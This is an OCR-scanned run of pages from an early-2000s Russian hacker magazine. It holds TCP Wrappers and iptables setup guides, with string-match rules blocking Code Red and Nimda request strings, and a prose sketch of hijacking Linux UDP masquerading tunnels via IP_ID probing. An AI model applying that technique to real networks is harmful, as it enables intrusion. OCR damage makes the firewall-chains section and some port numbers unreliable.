тайм-аут по умолчанию полагается 5 минут, это одно и то же значение для 
форвардинга UDP-naketos. А это позволит хакеру найти действующий тун- 
нель и поюзать его в своих корыстных целях. Протоколы ТСР и UDP требу- 
ют, чтобы и порт, с которого отправлен пакет, и порт, на который он отправ- 


лен, так же как адрес источника и получателя, обязательно присутствовали 
в пакете. Порт для исходящих соединений обычно выбирается, как первый 
доступный из диапазона 1024-65535 (подробнее об этом читай в предыду- 
щем Спеце) - а как же выбирает порты файрволл с установленным маскара- 
дингом? Ядро использует для этих целей порты от 61000 до 65906 по умол- 
чанию, позволяя теоретически обслуживать до 4096 ТСР и ИОР-сессий од- 
новременно. Эти значения могут быть изменены путем редактирования и 
пересборки кода или же редактированием /ргос - файловой системы, через 
которую можно осуществить доступ к адресному пространству процесса. 
Итак, теперь, когда соединение, запрошенное внутренним хостом megatron, 
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осуществляется в порт 1050, и его назначение - внешний О№-сервер 
dns_server, а в порт 53 маскирующая машина добавляет новое поле табли- 
цы маскарадинга, выглядящее примерно так: 

megatron A:1035 (651001) -> dns_server B:53 

Порт в скобках - это порт файрволла, с которого оно осуществляет соеди- 
нение и который использует для коннекта с портом 53 хоста В. А далее мы 
рассмотрим, как хакер может перезаписать правую часть данного соедине- 
ния, чтобы подключиться к порту внутреннего хоста. Код, отвечающий за 
ООР-маскарадинг, проверяет только ПОРТ НАЗНАЧЕНИЯ, чтобы определить 
- пришел ли пакет из внутренней сетки или извне, и должен быть переслан 
внутрь. Затем поля PORT и HOST устанавливаются в исходный адрес и порт 


отправителя. Хацкеру достаточно только определить порт, открытый для 
соединения на файрволле, чтобы внести свои модификации в таблицу, пе- 
резаписав поля Host 7:53 своими данными. Но как определить, что порт из 
диапазона 65100 - 65096 используется для форвардинга соединений? Мы 
просто посылаем тестовый пакет каждому из этих хостов (файрволлу и 
внешнему хосту, с которым производится соединение) и просматриваем 
поле IP_ID в каждом из ответов. Данное поле последовательно увеличива- 
ется каждым хостом с каждым посланным пакетом, и ответы от файрволла 
будут иметь IP_ID ВНУТРЕННЕГО хоста (это примерно на 1000 меньше, чем 
IP_ID пакетов, полученных непосредственно от файрволла). В результате 
этих манипуляций у хацкера появился туннель к порту закрытой тачки во 
внутренней сети. Вот так вот. Читай доки, изучай исходники *п1х`ов и пей 


чаек с лимоном, и тогда все будет пинцетно. 


=- 
dk 


Теперь вы можете оформить редакционную подписку на любой российский адрес 


Для этого необходимо: 


1. Заполнить подписной купон 
(или его ксерокопию). 


2. Заполнить квитанцию (или 
ксерокопию). Стоимость 
подписки заполняется из 
расчета 100 рублей за 1 журнал. 
В стоимость подписки включена 
доставка заказной бандеролью. 


3. Перечислить стоимость 
подписки через Сбербанк. 


4. Обязательно прислать в 
редакцию копию оплаченной 
квитанции с четко заполненным 
купоном 
или по адресу: 
103031, Москва, 
Дмитровский переулок, д 4, 
строение 2, 
ООО "Гейм Лэнд", с 
пометкой "Редакционная 
подписка" 
или по электронной почте 
subscribe_xs@gameland.ru 
или по факсу 924-9694 
(с пометкой "редакционная 
подписка"). 


БОНУС! 


При оформлении годовой под- 
писки на 2003 год - 2 свежих 
номера в подарок!!! 

При оформлении подписки на 
1-е полугодие 2003 года - один 
журнала в подарок!!! 


ВНИМАНИЕ! 


Подписка производится с 
номера, выходящего через 
один календарный месяц 
после оплаты. Например, 
если вы производите оплату в 
Сентябре, то подписку можете 
оформить с ноября. 


Подписка оформляется на 
любой срок. 


СПРАВКИ 
по электронной почте 
subscribe_xs@gameland.ru 
или по Ten. (095) 292-3908, 
292-5463 


редакционная 


ПОДПИСКА! 


Открыта 


> q 
„№ к. 


Прошу оформить подписку на журнал "ХакерСпец" 


2002г. М М ШШШШШШШшШппП 
2003. ППП оп 


(месяцы) 


(отметьте квадраты, соответствующие календарным месяцам выхода журнала, 


которые вы хотели бы получить) 


ФИО. 

ПОЧТОВЫЙ АДРЕС: индекс областыкрай 

Город/село ул. 

Дом корп. KB.. КОД тел. 


Сумма оплаты 


Подпись Дата 


е-тай: 


Копия платежного поручения прилагается. 


Извещение 


Кассир 


ИНН 7729410015 ООО"ГеймЛэнд" 
р/с №40702810700010298407 

к/с №30101810300000000545 

БИК 044525545 


Плательщик 


Адрес (с индексом) 


Назначение платежа Сумма 


Оплата журнала "ХакерСпец" 
за 200 _г. 


Подпись плательщика 


Квитанция 


Кассир 
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р/с №40702810700010298407 

к/с №30101810300000000545 
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Назначение платежа Сумма 


Оплата журнала "ХакерСпец" 
за 200_г. 


Подпись плательщика 
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ТСР» 


WRAPPERS 


плащ для админа 


MenderX (forother@fromru.com) 


Сегодня мы подробно рассмотрим популярный метод защиты 
сетей - р-маскарадинг. Что за зверь такой и кто его юзает? 
Сейчас в Интернете это очень-очень популярно среди многих 
компаний. Конечно же, никто из админов сеток не хочет, 
чтобы вся сеть, подрубленная к нету, была доступна все 
остальным. Нужно, чтобы доступ был только туда, куда надо 
админам и злобному боссу, а кто пытается пройти куда-то 
еще - сразу и без разговоров посылался нах. 


Пакет ТСР Wrappers (wrappers - обертки) занимает 25-ое место (из 50) в 
рейтинге полезных админу (не буду скрывать, иногда и хакеру =) утилит, 
проводимом Insecure.org. Это место находится не так далеко от 18-ого, 
оккупированного iptables/netfilter/ipchains/ipfwadm. Что же это за 
обертки? Чем они полезны админу? Я постараюсь ответить на эти и 
многие другие вопросы, касающиеся ТСР Wrappers, в рамках одной 
статьи. 


ШО ЗА ФАНТИКИ? 


Пакет этих оберток обеспечивает контроль доступа к системе (или сети). 
Также он логирует все коннекты к сервисам. Чтобы ты лучше понял 
механизм работы, я объясню на двух примерах: когда этот пакет 
установлен в системе и, соответственно, когда не установлен. 

При старте системы запускается демон inetd/xinetd и ищет в файле 
/etc/inetd.conf или каталоге /etc/xinetd.d записи разрешенных 
сервисов. И когда он получает запрос от, например, клиента telnet, то 
запускает экземпляр другого демона - telnetd. Сам посуди, проще 
запускать демон telnetd тогда, когда он действительно нужен (то есть 
когда к нему уже обратились), чем постоянно поддерживать кучу служб! 
Но эти сервисы (сервисы, демоны, службы - 
одно и то же) по умолчанию не используют 
контроль доступа к системе, а сие не есть гуд. 
Теперь посмотрим, что будет, если в системе 
установлен пакет ТСР Wrappers. После 
получения запроса от клиента tcpd (это и 
есть обертка) перехватывает запрос и 
обрабатывает его (сверяет с установленными 
правилами), после этого он может или 
разрешить коннект (передать его нужному 
сервису, например, telnetd) или отказать в 
нем. Также он логирует все соединения, 
отправляя их демону syslogd (глянь - 
/etc/syslog.conf). 

Рассмотрим структуру /etc/inetd.conf (если 
перед сервисом стоит #, значит - он 
закомментирован, т.е. запрещен, советую 
тебе оставить только самые нужные 
службы). Пример записи, когда пакет ТСР 
Wrappers отсутствует в системе: 


telnet stream tcp nowait root 
/usr/sbin/in.telnetd telnetd 


A теперь, когда присутствует: 


telnet stream tcp nowait root /usr/sbin/tcpd 
in.telnetd 


Здесь демон /usr/sbin/tcpd обертывает демон telnetd. 


Если у тебя в системе отсутствует файл /etc/inetd.conf, то, скорее всего, 
используется xinetd. Это усовершенствованный демон Инета, так что 
топай в /etc/xinetd.conf. Если там присутствует строка «includedir 
/etc/xinetd.d», то демон xinetd читает содержимое этого каталога и 
использует его как настроечный. В таком каталоге каждый файл 
содержит инфу об одной службе - чтобы запретить службу, достаточно 
удалить файл (или добавить в него строку «disable=yes»). На первом 
скрине виден конфигурационный файл службы телнет без 
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рис. 


использования фантиков, на втором - с использованием оных. Тоже 
очень хорошо видно, как tcpd обертывает telnetd. 


Не лишним будет сказать, что Xinetd имеет свои собственные функции 
ограничения доступа. Для ограничения добавь строку onlv from = 
<доверенный хост> или по_ассез$ = <хост твоего 
врага> в файл настроек демона. 

Теорией я тебя уже достаточно загрузил, пора 
переходить к практике, т.е. к настройке. 


ИСПОЛЬЗОВАНИЕ 


Скачать пакет ТСР Wrappers (автор - Виетс 
Венема) ты можешь с этого фтп - ftp://ftp.por- 
cupine.org/pub/security/, там же ты найдешь 
еще много утилит, связанных с security. Но 
особо не спеши, скорее всего этот пакет уже 
установлен у тебя в системе :). Для инстала 
распакуй архив, заходи в распакованную диру, 
далее тебе придется править Makefile под себя, а 
потом вводить таке. Скомпилировав с ключом - 
DPARANOID, ты защитишь себя от ip-spoofing-a 


со стороны клиента, т.е. Wrappers будут всегда проверять имя хоста 
дважды и при несовпадении в коннекте откажут =). 

А теперь о настройке. Все правила доступа читаются из двух файлов - 
/etc/hosts.deny и /etc/hosts.allow. Прочитав хотя бы половину Спеца, ты 


уже должен понять, что 
/etc/hosts.deny запишем хосты, которым не доверяем, а в 
/etc/hosts.allow запишем доверенные хосты. В только что 
установленной системе эти файлы пусты, так что приступим к конфигуру. 
Виетс Венема создал специальный язык (hosts_options) для этого дела, и 
первое, что надо добавить в /etc/hosts.deny, - запись «ALL: ALL». А 
теперь разберем ее: слева список демонов, потом идет символ «:» 
(разделяющий символ) и далее список хостов. В данном примере мы 
всем хостам запретили юзать все сервисы =) (ALL - это символ- 
заместитель). Это правило называется - «то, что не разрешено, 


значит deny и allow. Правильно, в 


ТСР WRAPPERS 


запрещено». Вот теперь можем приступить к редактированию 
/etc/hosts.allow, т.е. разрешать. 
Запиши туда строчку - «ALL: 127.0.0.1»ь, что позволит тебе 
подсоединятся ко всем сервисам (можно перечислять хосты дальше 
через пробел). 
В языке hosts_options имеется еще один очень полезный оператор, а 
А теперь о настройке. Все правила доступа зовут ero EXCEPT. Зачем он нужен? Ну, к примеру, если в /etc/hosts.deny 
читаются из двух файлов - /etc/hosts.deny записать - «ALL EXCEPT in.telnetd: ALL», то ко всем сервисам, кроме tel- 
и /etc/hosts.allow. net, будет запрещено подсоединяться. Возможно, ты уже подумал, что 
ничего сложного в языке нет, но ты глубоко ошибаешься, посмотри на 
этот пример: 


/etc/hosts.deny: 
ALL: ALL: spawn ((/path/to/save_finger -l @%h; \ 
echo Alien’s IP %a; echo Alien’s domain %n; \ 
/bin/mail -s « %c wanted to connect %s at ‘date’» root)& 


ALL: ALL - это мы уже разобрали, потом идет еще один знак «:» 
(разделитель) и команды, которые выполняются при коннекте, Spawn - 
команда, которая запускает shell. Для того, чтобы выяснить, кто работает 
на удаленной машине, я использую safe_finger (поставляется вместе с 
обертками), в документации написано, что он безопаснее стандартного. 
Затем я вывожу на консоль ТР и доменное имя того хрюнделя, который 
хочет приконнектиться. А также стучу кому надо, т.е. отправляю письмо 


После получения запроса от клиента tcpd (это 
и есть обертка) перехватывает запрос и 
обрабатывает его, после чего может или 
разрешить коннект, или отказать в нем. 


руту с темой (ключ -S) «%с хочет присоединиться к %$ в такое-то число». 
Тут %а - IP клинета, %п - доменное имя клиента, %с - информация о 
клиенте, %S - информация о сервере. Т.е. получается, что я отправляю 
письмо с темой - «Какой-то ежик (идет инфа о нем) хочет 
приконнектиться к моей тачке (идет инфа о тачке, с которой 
отправляется письмо) в такое-то время» (заменяется на дату). Если ты 
тоже хочешь мутить подобные конструкции - милости просим в man 
pages: hosts_options(5) и hosts_access(5) (5 - это номер секции, File 
Formats). 


ТЕСТИРОВАНИЕ 


Иногда ты можешь просто запутаться и настроить не так, как хочется, а 
так, как получится =(. А поймешь ты это только тогда, когда тебя в 
очередной раз поимеют :(. Вот для этого и включены в пакет утилиты 
тестирования настроек - tcpdchk и tcpdmatch. Первая проверяет 
неверные пути, неверные имена хостов и ip, службы, для которых 
указаны правила, но которые не защищены демоном tcpd и т.д. Запусти 
ее, и она выдаст тебе инфу об ошибках. 

А вот tcpdmatch предсказывает, как Wappers обработает конкретное 
сообщение к службе. Использование: tcpdmatch [Демон] [хост]. 


КОНЕЦ 


ТСР Wappers ассоциируются у меня с плащом от дождя, тогда как xinetd - 
это современная непромокаемая куртка, а файрволл - это зонтик (какой 
богатый внутренний мир :) - прим. ред.). Но у всех этих штук есть одно 
общее - при их использовании существует вероятность промокнуть ;). А 
вот если юзать связку из этих средств защиты, то вероятность быть 
замоченным уменьшается. Как бы то ни было, желаю тебе всегда 


выходить сухим из воды! 
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ПОСТРОЦ 
СЕБЕ CAT: 


БЫСТРЫЙ СПОСОБ 
ПОЗНАКОМИТЬСЯ C IPTABLES 


ViTLS (vitls@beshtau. ru) 


ВТЫКАЕМ 


Надеюсь, ты сумеешь установить пакет с исходниками ядра или скачать 
свежее ядро ветки 2.4.х с ftp.kernel.org. Коротко это будет выглядеть 
так: администратором входишь в каталог /usr/src/linux, есессено, в кон- 
соли или в терминале. Даешь команду: 

make теписоп 9 

или 

make xconfig (если ты работаешь в Х) 

Идешь в Networking Options и включаешь поддержку Network packet fil- 
tering (Рис. 1). 


Затем, спустившись немного ниже, можешь настроить фильтр пакетов в 
разделе Netfilter Configuration (Рис. 2). 

Если что-то из вариантов настройки фильтра пакетов тебе покажется не- 
понятным, ая на 100 процентов уверен, что тебе будет непонятно почти 
все, я настоятельно рекомендую выйти в Сеть и прочитать (а заодно 
слить на свой винт) вот эту доку: http://gazette.linux.ru.net/rus/arti- 
cles/iptables-tutorial.html. Там про iptables написано почти все. 

Сразу скажу, что в современных дистрибутивах ALT Linux Master 2.0, ASP 
Linux 7.2, Mandrake Linux 7.2 и выше, Red Hat Linux 7.0 и выше, SuSE 
Linux, Debian 2.2 и выше и так далее - пакетный фильтр iptables уже 
включен в ядро и настроен на решение часто используемых задач. Зна- 
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чит, тебе с большой вероятностью не придется самому заниматься KOH- 
фигурированием и сборкой ядра. 

Другое дело в случае консервативного дистриба Slackware или Gentoo. 
Скорее всего, тебе самому придется ковыряться в ядре, собирать его, ска- 
чивать пакет iptables (его тоже надо будет собрать) и устанавливать все 
это барахло. Но я уверен, справившись с установкой такого дистрибутива, 
ты на 100% расправишься с такой мелочью, как настройка и сборка ядра. 
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Гриф & Эйн Хагалаз 


УЧИМ ПРАВИЛА 


В iptables правило фильтрации определяет, как из общего потока данных 
отбирать определенные пакеты и что с ними делать. С приходящим или 
уходящим пакетом ты можешь сделать не очень много, но этого вполне 
достаточно, чтобы создать довольно мощную защиту. 

Пакет мы может принять, отбросить с уведомлением отправителя пакета, 
уничтожить или переслать на другое правило или куда-то еще. Несколь- 
ко правил составляют цепочку. Фильтр просматривает правила в цепоч- 
ке одно за другим и выполняет предписанные действия. 

Есть стандартные цепочки, но можно намутить и пользовательские, их 
может быть сколько угодно и каждая из них может иметь свое имя. 


Стандартная цепочка INPUT 

В нее попадают все ВХОДЯЩИЕ в фильтр пакеты. 

Цепочку INPUT проходят пакеты, которые предназначены локальным 
приложениям (самому firewall’y). 


Стандартная цепочка OUTPUT 
В нее попадают все ВЫХОДЯЩИЕ из фильтра пакеты. Цепочка OUTPUT 
используется для фильтрации исходящих пакетов, сгенерированных при- 
ложениями на самом firewall’e. 


Стандартная цепочка FORWARD 
Используется для фильтрации пакетов, идущих транзитом через firewall 
(во внутреннюю сеть). 


Так как ты защищаешь только свой компьютер, можно обойтись первыми 
двумя. 

Пакетный фильтр iptables может работать с тремя таблицами правил. Таб- 
лица для фильтрации filter (она ставится по умолчанию, если явно ничего 
не указано), таблица для па{-маскарадинга и трансляции адресов (очень 
полезно для вывода локалки в Инет). И, наконец, таблица mangle для ре- 
дактирования пакетов. 


В каждую таблицу заносятся цепочки правил фильтрации. Они последова- 
тельно просматриваются и исполняются фильтром. Цепочки ты либо зано- 
сишь сам из командной строки, либо пишешь сценарий Ha shell. 


Хочу сказать, что скриптовые языки вроде perl и php для такого дела не 
подходят, хотя на них и можно написать системы, облегчающие состав- 
ление правил и цепочек. Зайди на www.freshmeat.net и поищи по слову 
firewall или по слову iptables - увидишь массу ссылок на программы для 
быстрого и удобного составления правил фильтрации пакетов. 


ПРАВИЛА ПО КОСТОЧКАМ 


Правило состоит из нескольких элементов - команды, опции, критерия отбо- 
ра и действия. Элементы могут в принципе располагаться как угодно, но луч- 
ше придерживаться указанного порядка - так будет потом понятнее самому. 
Команды предназначены для того, чтобы сказать фильтру, что мы будем 
делать. Например, добавить правило в цепочку, удалить правило, очис- 
тить цепочку, вывести список правил в цепочке и тому подобное. 

Опции нужны, чтобы определенным образом модифицировать выводи- 
мую на экран информацию или выполнять добавочные, не присущие са- 
мому фильтру действия (например, округлять числовые показатели или 
подгружать модуль ядра). 

Критерий отбора. Это самая важная часть правила. Пакетный фильтр при 
разборках с пакетом смотрит именно на них. В качестве критериев отбора 
может выступать интерфейс, с которого пришел пакет, адрес отправителя или 
адрес получателя, порт отправителя или порт получателя, тип протокола. 
Действие. Действие определяет, что именно нам делать с пакетом, кото- 
рый удовлетворяет заданному тобой критерию. 

Самый полный список команд, опций, критериев и действий ты найдешь в 
доке Iptables-tutorial. Там все по-русски, поэтому тебе много не придется 
ломать голову. К тому же там есть просто шикарные примеры. 


РАЗБЕРЕМ ПРАВИЛО: 


iptables -А INPUT -i ethO -p tcp -5 0/0 -4 192.168.1.1 —dport 53 -j DROP 
Вот его части: 


ПОСТРОЙ СЕБЕ САМ 


* iptables - системная программа для вызова утилиты управления пакет- 
ным фильтром; 

* -А INPUT - команда iptables, означающая «добавить (-А) новое прави- 
ло в цепочку INPUT»; 

* критерий -1 ethO говорит, что нам нужен пакет, приходящий с интер- 
фейса (-i) ethO (сетевуха); если у тебя диал-ап, то интерфейс, скорее 
всего, будет ррр0; 

* критерий -р говорит, что нам нужен пакет протокола (-р) tcp; 

* критерий -s 0/0 говорит, что нам нужен пакет с адресом отправителя (-$) 
любым, то есть 0.0.0.0 с маской подсети 0.0.0.0 или в краткой записи 0/0; 
* критерий -d 192.168.1.1 говорит, что нам нужен пакет, который полу- 
чает (-d) машина с адресом 192.168.1.1; 

* критерий —dport 53 говорит, что номер порта принимающей (—dport) 
машины должен быть равен 53; 

* действие -j] DROP означает, что если пакет удовлетворяет ВСЕМ пере- 
численным критериям, то есть если все критерии присутствуют, то этот 
пакет прыгнет (-j) на цепочку DROP. Проще говоря, он будет уничтожен. 


В результате выполнения этого правила на защищаемой машине получим 
вот такую картину после сканирования портов: 


[vitls@zeelog:~]# nmap 192.168.1.1 


Starting nmap V. 2.54BETA37 (www.insecure.org/nmap/) 
Interesting ports on 192.168.1.1 (192.168.1.1): 
(The 1597 ports scanned but not shown below are in state: closed) 


Port State Service 
21/tcp open ftp 
25/tcp open smtp 
53/tcp filtered domain 

110/tcp open pop-3 


Nmap run completed — 1 IP address (1 host up) scanned in 2 seconds 
[vitls@zeelog:~]# 
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FIREWALL 


КУЕМ ЦЕПИ 

Как я уже успел упомянуть, правила могут быть объединены в’цепочки. В 
твоей системе защиты может быть несколько независимых друг=от друга 
цепей. Про стандартные цепочки ты ya ie, а любая нестандартная 
цепочка, то есть тв СТВенная, может взаимодействовать со стандарт- 
ной. Например, мо :ять пакет из цепочки INPUT, проверить ero на 
соответствие он ик отбора и отправить на твою/собственную 
цепочку для дальнейшей экзекуции. Основываясь на этих возможностях, 
можно построить очень сложную систему распределения и фильтрации 
входящего к тебе или исходящего от тебя трафика 


—— „в fi 
Самое главное заключаетея»вамудрости построения посл ательн 
е рос строен оследов ) 
сматривает правила исключитель- 


правил в цепочке. ЕЯ филь про 
|. vy = > = 
но в том порядке, воторым ты их задаешь. Он тупой и исполнительный, om = 


Если ты в первом правиле скажешь, что такой-то пакёт отправить на 
уничтожение, а затем вторым правилом скажешь, что такбй же пакетя 
нимать для пересылки, в ответ на это я тебе отвечу, что до второго 
вила твой пакет просто не доживет, и абота пойдет псу под» 
Так что всегда анализируй To; писале и Pa 

i =” - = 


КАК ЭТО ДЕЛАЕТСЯ? 7 
Цепочки ты можешь вводить л прямую 
(shell), в качестве которой=уТебя могут=быть sli, bas 


что-то еще твое л ое. Я имерыйбуду привод AT 

ного sh, так как он есть практическиев Любом дистрибутиве 

Вводя правила непосредственно из shell, ты должен их’набирать после- 
довательно и быть осторожным, любая ошибка - и тебейпридется BBO. 
дить: iptables -F имя_цепочки, чтобы ее очистить. =” 

Для устранения этих проблем лучше написать сценарий, который Mg 
дет легко отредактировать в любой момент и выполнить только тогда, 
да он будет полностью готов. Сгодится-любой текстовый редактор. В 
но текст будет обычный, посему навороты, вроде word, на фиг He J 
Для примера я наведу разборки с простым сценарием : if 


| = ae 
ПРОСТОЙ СЦЕНАРИЙ 


Задача - с помощью iptables закрыть на ррро все порты с 1 по 1024 и ос- 
тавить открытыми только некоторые, например, 53 и 80. Чтобы кто-то из 
внешней сети мог воспользоваться только нашим dns сервером и www 
сервером. 

Внутренности файла сценария выглядят примерно так: 


Oy- 


#!/bin/sh 

IPT=/usr/sbin/iptables 

$IPT -F INPUT 

$IPT -А INPUT -i ррро -p tcp -s 0/0 —sport 0:65535 -d 0/0 —dport 80 -j 
ACCEPT 

$IPT -A INPUT -i ррро -p tcp -s 0/0 —sport 0:65535 -d 0/0 —dport 
1:1024 -j DROP 

$IPT -А INPUT -1 ррро -p udp -s 0/0 —sport 0:65535 -d 0/0 —dport 53 -j 
ACCEPT 

$IPT -A INPUT -i ррро -p udp -s 0/0 —sport 0:65535 -d 0/0 —dport 
1:1024 -j DROP 


Теперь построчно: 


#!/bin/sh 
В этой строке мы говорим командной оболочке, что данный сценарий бу- 
дет выполняться программой /bin/sh. 


IPT=/usr/sbin/iptables 

Объявляем переменную IPT, куда заносим строку, содержащую путь к TO- 
му месту, где находится утилита iptables. В данном случае /usr/sbin/ipt- 
ables. В своей системе ты этот путь можешь узнать, выполнив в команд- 
ной строке команду which iptables. 


$IPT -F INPUT 

В результате выполнения сценария $1ТР будет заменена Ha /usr/sbin/ipt- 
ables, то есть мы обозначаем саму утилиту iptables. Это нужно для удоб- 
ства, чтобы по десять раз не писать одно и то же. Команда -F INPUT при- 
казывает очистить цепочку INPUT. 


$IPT -А INPUT -i ррро -р tcp -s 0/0 —sport 0:65535 -d 0/0 —dport 80 -j 
ACCEPT 
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Данная строка добавляет в цепочку INPUT фильтр по критериям: пакет 
должен прийти с интерфейса ррро (-1 ррро), пакет должен быть по про- 
токолу tcp (-p tcp), прийти с любого адреса (-5 0/0), с любого из портов, 
указанных в диапазоне (—sport 0:65535), пакет должен быть адресован 
любому адресу (-d 0/0) и прийти на порт 80 (—dport 80). Если пакет 
подходит под ВСЕ условия, он направляется в цепочку ACCEPT (-j 
АССЕРТ). То есть принимается системой. Если пакет не подходит под дан- 
ное правило фильтрации, то он переходит к следующему правилу в це- 
почке: 


$IPT -A INPUT -1 ррро -p tcp -s 0/0 —sport 0:65535 -d 0/0 —dport 
1:1024 -j DROP 

Данная строка добавляет в цепочку INPUT фильтр по критериям: пакет 
должен прийти с интерфейса ррро (-1 ррро), пакет должен быть по про- 
токолу tcp (-p tcp), прийти с любого адреса (-5 0/0), с любого из портов, 
указанных в диапазоне (—sport 0:65535), пакет должен быть адресован 
любому адресу (-d 0/0) и прийти на любой порт в указанном диапазоне 
(—dport 1:1024). Если пакет подходит под BCE условия, он направляется 
в цепочку DROP (-j DROP). То есть уничтожается системой. 


Короче, в этом правиле уничтожаются все пакеты на порты от 1 до 1024, 
которые не подпадают под предыдущее правило. Задача же стояла за- 
крыть все, кроме 80-го порта, вот мы и сделали это. 


Далее: 

$IPT -А INPUT -1 ррро -p udp -s 0/0 —sport 0:65535 -d 0/0 —dport 53 -j 
ACCEPT 

Данная строка добавляет в цепочку INPUT фильтр по критериям: пакет дол- 
жен прийти с интерфейса ррро (-1 pppO), пакет должен быть по протоколу 
udp (-р udp), прийти с любого адреса (-s 0/0), с любого из портов, указан- 
ных в диапазоне (—sport 0:65535), пакет должен быть адресован любому 
адресу (-d 0/0) и прийти на порт 53 (—dport 53). Если пакет подходит под 
ВСЕ условия, он направляется в цепочку ACCEPT (-j ACCEPT). То есть прини- 
мается системой. 


И наконец: 

$IPT -A INPUT -1 ррро -p udp -s 0/0 —sport 
0:65535 -d 0/0 —dport 1:1024 -j DROP 

Данная строка добавляет в цепочку INPUT 
фильтр по критериям: пакет должен прийти с 
интерфейса ррро (-1 ррро), пакет должен быть 
по протоколу udp (-p udp), прийти с любого ад- 
реса (-5 0/0), с любого из портов, указанных в 
диапазоне (—sport 0:65535), пакет должен 
быть адресован любому адресу (-d 0/0) и прий- 
ти на любой порт в указанном диапазоне (— 
dport 1:1024). Если пакет подходит под BCE yc- 
ловия, он направляется в цепочку DROP (-j 
DROP). То есть уничтожается системой. 


СОХРАНЯЕМ И ВОССТАНАВЛИВАЕМ 


ПРАВИЛА 
Iptables хранит все таблицы и цепочки в опера- 
тивной памяти компьютера. Но авторы не были 
идиотами и сделали возможность сохранения 
настроек и их последующего восстановления. 
Для этого в природе существуют утилиты ipta- 
bles-save и iptables-restore. Их использовать ну 
очень просто. 


Для сохранения: 

iptables-save > filename 

(надо указать имя файла с сохраненными це- 
почками). 


Для восстановления: 

iptables-restore < filename 

(надо указать имя файла с сохраненными це- 
почками). 


Iptables-save сохранит все твои цепочки в спе- 
циальном файле. А iptables-restore их потом 
так же хорошо восстановит. 


Если ты намерен пользоваться iptables посто- 
янно, лучше всего один раз написать и отладить 
набор нужных тебе правил. Затем дать сохра- 
нить при помощи iptables-save. Для восстанов- 
ления же при включении компьютера нужно в 
конец одного из стартовых сценариев (реко- 
мендуется /etc/rc.d/rc.local) добавить строку 
iptables-restore < filename, где filename - имя 
файла с правилами, сохраненными при помощи 
iptables-save. 


ПОЛЕЗНЫЕ ПРИМЕРЫ 


Как настроить пакетный фильтр для фильтра- 
ции по содержимому пакетов? 


(Следующие правила блокируют прохождение 
пакетов, данные в которых содержат подстроку 
virus.exe и ведут лог пакетов со строкой secret 
внутри: 


#!/bin/sh 


iptables -A INPUT -m string —string «secret» -j 
LOG —log-level info \ —log-prefix «SECRET» 
iptables -I INPUT -j DROP -p tcp -s 0.0.0.0/0 -m 
string —string «virus.exe» 


# Block Code Red 
iptables -I INPUT -j DROP -p tcp -m string — 
string «cmd.exe» 


# Block Nimda 

iptables -I INPUT -j DROP -p tcp -m string — 
string «root.exe» 

iptables -I INPUT -j DROP -p tcp -m string — 
string «default.ida» 


Другая ситуация: машина подключена к Инету 
напрямую, нужно сделать так, чтобы доступ с 
Hee был только на ftp, а все остальные in и out 
пакеты блокировались. 


iptables -F OUTPUT 

iptables -P OUTPUT DROP 

iptables -A OUTPUT -p tcp —dport 20 -j ACCEPT 
iptables -A OUTPUT -p tcp —dport 21 -j ACCEPT 
iptables -A OUTPUT -p udp —dport 53 -j ACCEPT 
# это если не хочешь по ip лазать 


iptables -F INPUT 

iptables -P INPUT DROP 

iptables -A INPUT -р tcp -m state —state 
ESTABLISHED, RELATED -j ACCEPT 

iptables -A INPUT -p udp —sport 53 -j ACCEPT # 
опять же для dns 


ЧТО ЧИТАЕМ? 


Читать тебе, перчик ты недозрелый, придется 
много, часто и густо. Ха! Не делай такое кислое 
лицо - это тебе не идет. Ты думаешь, что крутые 
перцы, о которых идет такая громкая слава, ро- 
дились с такими мозгами? Ни хрена подобного! 
Они просиживают ночами, пытаясь вникнуть в 
документацию. Бери с них пример. И твои нер- 
вы станут мягкими и шелковистыми. 

Вот тебе список документов и статей для ин- 
тенсивной самоподготовки: 


1. Kernel-HOWTO 

2. Linux 2.4 Packet-filtering- HOWTO 
(http://www.linux.org.ru:8100/books/HOWTO/ 
index.html) 


3. Iptables-HOWTO 
(http://www.linuxguruz.org/iptables/howto/ip 
tables-HOWTO.html) 


4. Firewall-HOWTO 
(http://linuxdocs.org/HOWTOs/Firewall- 
HOWTO.html) 


5. NAT-HOWTO 
(http://imc.edu.trekhgorny.ru/~merlin/ipta- 
bles/NAT-HOWTO.linuxdoc.html) 


6.Netfilter-hacking-HOWTO 
(http://www.netfilter.org/documentation/HO 
WTO/netfilter-hacking-HOWTO.html) 


7. Iptables-tutorial 
(http://gazette.linux.ru.net/rus/articles/ipta- 
bles-tutorial.html) 


Воти все. Желаю успехов Ha тяжком пути ха- 
кера. 
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ЛУЧШИЙ И ПОЛЕЗНЕЙШИЙ ЖУРНАЛ 
ОБО ВСЕМ МОБИЛЬНО-ЦИФРОВОМ 
И ЦИФРО-МОБИЛЬНОМ 
www.mconline.ru 


+ Основные события в мире мобильных 
цифровых решений + наши комментарии 
+ Новинки на прилавках реальных и 
виртуальных: РОА, ноутбуки, телефоны, 
+ камеры 


+ HP Jornada 728: Pocket РС с 
функциональностью ноутбука 

+ Asus MyPal A600: самый компактный Pocket 
PC уже в России Toshiba и 

+ Fujitsu-Siemens: удобство необычных 
решений в ноутбуках Nokia 7210: 

+ рыжий красавчик умеет многое LG W5200: 
мы считаем его удобнейшим 

+ телефоном-«книжкой» Nikon Coolpix 5700: 
для продвинутых фотографов и 

+ тех, кто хочет стать таковыми 


+ Карманный видеоплеер: сам себе 
видеосалон или крутим видео на PDA 

+ Обзор «лончеров»: идеи «Norton 
Commander» в карманных системах 

+ Бюджетные ноутбуки: настоящая 
мобильность по минимальной цене Эпоха 

+ «карманных» вирусов: комментарий 
Касперского Как правильно снимать 

+ осенью: добро пожаловать в фотошколу! 


+ Карманные компьютеры 
+ Ноутбуки 
+ Сотовые телефоны 
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ТУННЕЛИ НА КАЖДЫЙ ДЕНЬ 
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Чтобы ты не думал, что туннели это 
что-то необычное или исключи- 
тельное, задумайся о том, как 
ты подключен к Интернет. 
Допустим, ты сидишь на 
модеме. В этом слу- 
чае два модема 
(твой и провай- 
дерский) образу- 
ют цифровой 
туннель в теле- 
фонной сети 
(или цифровой 
канал). Через 
этот канал 

твой компью- 
тер может об- 
щаться с сетью 
провайдера. По 
лучается так, что 
COM-nopt твоего 
компьютера думает, 
что он связан напря- 
мую с СОМ-портом ком- 
пьютера твоего провай- 
дера. И действительно, если 
два компа подключить СОМ- 
портами через специальный кабель, 

то они смогут установить между собой со- 

единение. Важно понять, что двум компам все равно, есть ли между ними 
модемы или нет. То есть модемы для них невидимы (прозрачны). Поэтому 
такое соединение называется прозрачным. 

